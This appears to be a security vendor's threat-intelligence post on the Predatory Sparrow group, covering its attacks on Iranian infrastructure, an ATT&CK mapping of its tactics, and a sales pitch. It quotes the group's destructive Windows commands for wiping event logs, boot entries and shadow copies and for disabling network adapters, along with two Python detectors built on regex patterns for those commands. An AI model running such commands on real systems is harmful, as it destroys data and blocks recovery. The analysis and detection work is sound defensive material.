Predatory Sparrow: Inside the Cyber Warfare Targeting Iran's Critical Infrastructure
Predatory Sparrow is a cyber-sabotage group known for its highly disruptive operations, with a particular focus on targeting Iranian infrastructure and institutions. The group has publicly claimed responsibility for a series of high-profile cyberattacks against various sectors in Iran, including critical infrastructure, government organizations, and financial institutions. Their operations are often marked by substantial operational disruption, deliberate data destruction, and provocative public messaging aimed at taunting their targets. Analysts widely believe that Predatory Sparrow is affiliated with Israel, operating within the broader context of the ongoing cyber shadow war between the two nations, which has seen both offensive and defensive cyber operations unfold over the past decade.
The group has demonstrated a broad capability to impact diverse segments of Iran's national infrastructure, highlighting its sophisticated operational reach. One of their most notable operations involved Iran's national railway system, where cyberattacks led to widespread paralysis and significant operational delays, illustrating the group's ability to disrupt essential public services. Predatory Sparrow has also conducted attacks on Iranian industrial targets, such as steel companies, causing operational disruptions and triggering fires, further emphasizing the destructive nature of their campaigns. In the financial sector, the group has targeted major institutions, including Bank Sepah and the Nobitex cryptocurrency exchange. In a particularly high-profile financial attack, Predatory Sparrow claimed to have "burned" $90 million in cryptocurrency and published Nobitex's entire source code, infrastructure documentation, and internal privacy research and development [1], a move that exposed both operational vulnerabilities and sensitive intellectual property. These actions are widely interpreted as part of a broader strategy to destabilize Iran, disrupt critical operations, and respond to perceived Iranian cyber or geopolitical aggressions.
In this post, we explore the major historical operations of Predatory Sparrow, highlight their notable attacks on Iran's critical infrastructure and financial systems, and examine the group's tactics, techniques, and procedures (TTPs) to understand how they conduct disruptive cyber operations. Finally, we show how Picus helps defend against this group.
History & Major Activities of Predatory Sparrow Group
- September 2019 - A cyberattack targeted Alfadelex Trading, a Syrian company offering currency exchange and money transfer services [2].
- January 2020 - Cham Wings Airlines, a privately owned Syrian airline, was attacked [2].
- February - April 2020 - The network infrastructures of Afrada and the Katerji Group, both Syrian-based firms, were seized [2].
- November 2020 - Predatory Sparrow issued a threat to attack the Banias Oil Refinery in Syria, though it remains uncertain whether the attack took place [2].
- July 2021 - Predatory Sparrow attacked Iran's national railway system, disrupting services and displaying messages like "cyberattack" on station boards. This attack utilized the "Meteor" wiper malware [2].
- 27 June 2022 - The group claimed responsibility for a cyberattack on an Iranian steel manufacturing plant. The advanced operation triggered a major fire at the site, leading to significant physical damage.
- December 2023 - Predatory Sparrow claimed that it was behind a cyberattack that disrupted a large number of gas stations across Iran. In a statement posted on X (formerly Twitter), the group said the operation had disabled most of Iran's fuel pumps, describing it as a retaliatory move against the actions of the Islamic Republic and its regional proxies [3].
- 17 June 2025 - Soon after Israeli airstrikes on Iran, a Predatory Sparrow cyberattack targeted the state-owned Bank Sepah, disrupting its services. The group claimed to have erased the bank's data and accused it of financing Iran's military [4]. The group additionally claimed responsibility for a strike on the Iranian cryptocurrency exchange Nobitex the next day, in which they took $90 million in crypto assets and rendered them unrecoverable by transferring them to inaccessible addresses [1].
ATT&CK Mapping (TTPs) of Predatory Sparrow Group
Tactic: Reconnaissance
T1592 Gather Victim Host Information
In a Predatory Sparrow attack against Iran, researchers found a setup.bat script that performs host discovery by checking the machine's hostname against PIS-APP, PIS-MOB, WSUSPROXY, and PIS-DB; if a match is found, it aborts and removes the malicious folder. With this behaviour, the malware specifically avoids executing on hosts with PIS (Passenger Information System) names—systems that update platform boards—ensuring the attackers' message will be displayed properly on those public-facing devices [2].
Tactic: Execution
T1053.005 Scheduled Task/Job: Scheduled Task
Adversaries may abuse the Windows Task Scheduler to schedule initial or recurring execution of malicious code. Predatory Sparrow's msrun.bat, one of the scripts used in the attack on Iranian Railways and the Ministry of Roads and Urban Development, is responsible for unleashing a wiper: it moves wiper-related files to C:\temp. The script then creates a scheduled task named mstask, configured to run the wiper a single time at 23:55:00 [2].
T1059 Command and Scripting Interpreter
Predatory Sparrow used a sequence of Windows batch files — setup.bat → update.bat (started by setup.bat) — where update.bat uses the hardcoded password "hackemall" to unpack the next-stage scripts cache.bat, msrun.bat, and bcd.bat. This activity uses native Windows batch scripting to stage and execute multi‑stage payloads, and the extracted cache.bat disables all network adapters on the machine with the command [2]:
powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($_.NetEnabled) { $_.Disable() } }" > NUL
T1059.005 Command and Scripting Interpreter: Visual Basic
Both attacks in Syria by Predatory Sparrow began with a VBS dropper (resolve.vbs) that extracted a password-protected RAR to C:\Program Files\Windows NT\Accessories\, containing a second RAR and three VBS scripts. Resolve.vbs executed those scripts sequentially: the first enumerated installed programs to detect Kaspersky and attempted to uninstall it using hardcoded domain credentials. The second checked for Kaspersky's avp.exe and attempted to remove its license, and the final script extracted the second-stage RAR and executed its contained executable — a Stardust wiper variant [2].
Tactic: Defense Evasion
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
Attackers often encrypt or encode file contents to hide malicious artifacts and evade detection during intrusions. The Meteor wiper attributed to the Predatory Sparrow group used an encrypted configuration file named msconf.conf and also stored encrypted log files during its Iran-targeted attacks. A helper script for decrypting the configuration file and logs, built on the xor and u32 primitives of the malduck library, begins as follows [2]:
from malduck import xor, u32
T1070.001 Indicator Removal: Clear Windows Event Logs
A script named bcd.bat used by Predatory Sparrow leverages wevtutil to delete Security, System, and Application Event Viewer logs, effectively erasing forensic evidence of activity [2]. With administrator privileges, the event logs can be cleared with the following utility commands:
wevtutil cl security
wevtutil cl system
wevtutil cl application
T1562 Impair Defenses
Predatory Sparrow probes for third‑party antivirus (Kaspersky) and, when not found, targets built‑in protections. It has been observed to add attack‑related files and folders to Windows Defender's exclusion list. This behavior enables persistence and execution with a reduced chance of detection [2].
Tactic: Command and Control
T1071.001 Application Layer Protocol: Web Protocols
While some VBS scripts run, they issue GET requests to a command-and-control server to report progress using URLs of the form:
https://<C&C IP>/progress.php?hn=&dt=&st=&rs=
The query parameters transmit the host name (hn), current timestamp (dt), the execution step (st), and information about whether Kaspersky AV is running (rs), with the C&C IP varying between attacks [2].
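From the defender's side, the fixed shape of this beacon (a progress.php path carrying exactly the hn, dt, st and rs parameters) is a usable proxy-log signature that survives the change of C&C IP between attacks. The following Python detector is an added example, not code from the post or from Check Point; the proxy log format, the client addresses and the 203.0.113.7 / 198.51.100.1 server addresses are constructed placeholders.

```python
from urllib.parse import urlsplit, parse_qs

# Beacon shape this post attributes to Predatory Sparrow's VBS scripts:
# GET https://<C&C IP>/progress.php?hn=&dt=&st=&rs=
BEACON_PATH = "/progress.php"
BEACON_KEYS = {"hn", "dt", "st", "rs"}

def parse_proxy_line(line):
    """Constructed proxy log format: '<timestamp> <client> <method> <url> <status>'."""
    ts, client, method, url, status = line.split()
    return {"ts": ts, "client": client, "method": method, "url": url, "status": int(status)}

def is_progress_beacon(url):
    """True when the URL ends in progress.php and carries exactly the four beacon keys.
    Matching the parameter set rather than the host keeps the rule valid when the C&C IP changes."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(BEACON_PATH):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)  # keep hn=&dt=... with empty values
    return set(qs) == BEACON_KEYS

def find_beacons(lines):
    """Return the parsed records that look like progress beacons, with hn and st extracted."""
    beacons = []
    for line in lines:
        rec = parse_proxy_line(line)
        if rec["method"] == "GET" and is_progress_beacon(rec["url"]):
            qs = parse_qs(urlsplit(rec["url"]).query, keep_blank_values=True)
            rec["hostname"] = qs["hn"][0]   # victim host name reported by the script
            rec["step"] = qs["st"][0]       # execution step reported by the script
            beacons.append(rec)
    return beacons

# Constructed sample lines (not real traffic); the last two are benign look-alikes.
SAMPLE_PROXY = [
    "2021-07-09T10:00:01Z 10.1.2.3 GET https://203.0.113.7/progress.php?hn=WS01&dt=1625824801&st=1&rs=0 200",
    "2021-07-09T10:00:09Z 10.1.2.3 GET https://203.0.113.7/progress.php?hn=WS01&dt=1625824809&st=2&rs=1 200",
    "2021-07-09T10:00:12Z 10.1.2.9 GET https://example.com/progress.php?page=2 200",
    "2021-07-09T10:00:15Z 10.1.2.9 POST https://example.com/api/progress.php?hn=a&dt=b&st=c&rs=d 200",
]

if __name__ == "__main__":
    for b in find_beacons(SAMPLE_PROXY):
        print(b["client"], b["hostname"], "step", b["step"], b["url"])
```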
T1105 Ingress Tool Transfer
Adversaries may transfer tools or other files from external systems into a compromised environment; for example, a batch file used by the Predatory Sparrow Group downloads a CAB archive (env.cab) from the internal path \\railways.ir\sysvol\railways.ir\scripts\env.cab, and the use of that specific path indicates prior knowledge of the environment [2].
Tactic: Impact
T1485 Data Destruction
The main payload used by Predatory Sparrow against Iranian Railways and the Ministry of Roads and Urban Development is an executable named msapp.exe, a wiper designed to render infected machines unusable by locking them and wiping their contents. Upon execution, the malware hides its console window to reduce the chance of detection. The program records the phrase "Meteor has started" to an encrypted log file, suggesting the malware's internal name is "Meteor" [2].
T1490 Inhibit System Recovery
A malicious bcd.bat used by the threat actor Predatory Sparrow attempts to sabotage the Windows boot process by overwriting the boot configuration and then removing existing boot entries via the built-in BCDEdit utility using the command below [2]:
for /F "tokens=2" %%j in ('%comspec% /c "bcdedit -v | findstr identifier"') do bcdedit /delete %%j /f
Also, native Windows utilities have been abused by adversaries to disable system recovery features. For example, vssadmin.exe or Windows Management Instrumentation (WMIC) can remove all volume shadow copies. The Predatory Sparrow wiper attempts to remove shadow copies by running both the vssadmin and wmic commands [2]:
vssadmin.exe delete shadows /all /quiet
wmic shadowcopy delete
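The native-utility commands quoted under T1059, T1070.001 and T1490 above are all visible in process-creation telemetry, and seeing several of them on one host in a short window is a much stronger signal than any single one, since each also has legitimate administrative uses. The detector below is an added example, not code from the post or from Check Point; the tab-separated telemetry format and the host names are constructed.

```python
import re

# Rules derived from the native-utility commands this post attributes to Predatory Sparrow:
# (ATT&CK technique, description, regex over the process command line).
RULES = [
    ("T1070.001", "event log cleared with wevtutil",
     re.compile(r"\bwevtutil(\.exe)?\s+cl\s+(security|system|application)\b", re.I)),
    ("T1490", "boot entries deleted with bcdedit",
     re.compile(r"\bbcdedit(\.exe)?\s+/delete\b", re.I)),
    ("T1490", "shadow copies deleted with vssadmin",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("T1490", "shadow copies deleted with wmic",
     re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("T1059", "network adapters disabled through WMI in PowerShell",
     re.compile(r"Win32_NetworkAdapter.*\.Disable\(\)", re.I)),
]

def parse_line(line):
    """Constructed telemetry format: 'host<TAB>image<TAB>command line'."""
    host, image, cmd = line.rstrip("\n").split("\t", 2)
    return host, image, cmd

def scan(lines):
    """Return (host, technique, description, command line) for every rule that matches."""
    hits = []
    for line in lines:
        host, _image, cmd = parse_line(line)
        for technique, desc, rx in RULES:
            if rx.search(cmd):
                hits.append((host, technique, desc, cmd))
    return hits

def summarize(hits):
    """Distinct techniques per host; two or more on one host is the escalation signal."""
    per_host = {}
    for host, technique, _desc, _cmd in hits:
        per_host.setdefault(host, set()).add(technique)
    return {host: sorted(t) for host, t in per_host.items()}

# Constructed sample telemetry, not real logs; the WS03 lines are benign look-alikes.
SAMPLE_LOG = [
    "WS01\tcmd.exe\twevtutil cl system",
    "WS01\tcmd.exe\twevtutil cl security",
    "WS01\tcmd.exe\tbcdedit /delete {current} /f",
    "WS02\tvssadmin.exe\tvssadmin.exe delete shadows /all /quiet",
    "WS02\tWMIC.exe\twmic shadowcopy delete",
    "WS02\tpowershell.exe\tpowershell -Command \"Get-WmiObject -class Win32_NetworkAdapter "
    "| ForEach { If ($_.NetEnabled) { $_.Disable() } }\"",
    "WS03\tcmd.exe\twevtutil qe system /c:5",
    "WS03\tvssadmin.exe\tvssadmin list shadows",
]
```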
How Does Picus Simulate Predatory Sparrow Attacks?
We strongly suggest simulating Predatory Sparrow attacks with the Picus Security Validation Platform to test the effectiveness of your security controls against real-life cyber attacks. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Predatory Sparrow:
Threat ID   Threat Name                                Attack Module
77438       Predatory Sparrow Threat Group Campaign    Windows Endpoint
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
Aliases of Predatory Sparrow Group
Predatory Sparrow is also known as: Gonjeshke Darande, Indra.
References
[1] "Inside the Nobitex Breach: What the Leaked Source Code Reveals About Iran's Crypto Infrastructure." Accessed: Oct. 15, 2025. [Online]. Available: https://www.trmlabs.com/resources/blog/inside-the-nobitex-breach-what-the-leaked-source-code-reveals-about-irans-crypto-infrastructure
[2] "Indra — Hackers Behind Recent Attacks on Iran," Check Point Research. Accessed: Oct. 15, 2025. [Online]. Available: https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/
[3] E. Groll, "Israel-linked hacking group claims attack on Iranian gas pumps," CyberScoop. Accessed: Oct. 15, 2025. [Online]. Available: https://cyberscoop.com/israel-iran-cyberattack-houthi/
[4] Wikipedia contributors, "Predatory Sparrow," Wikipedia, The Free Encyclopedia. [Online]. Available: https://en.wikipedia.org/wiki/Predatory_Sparrow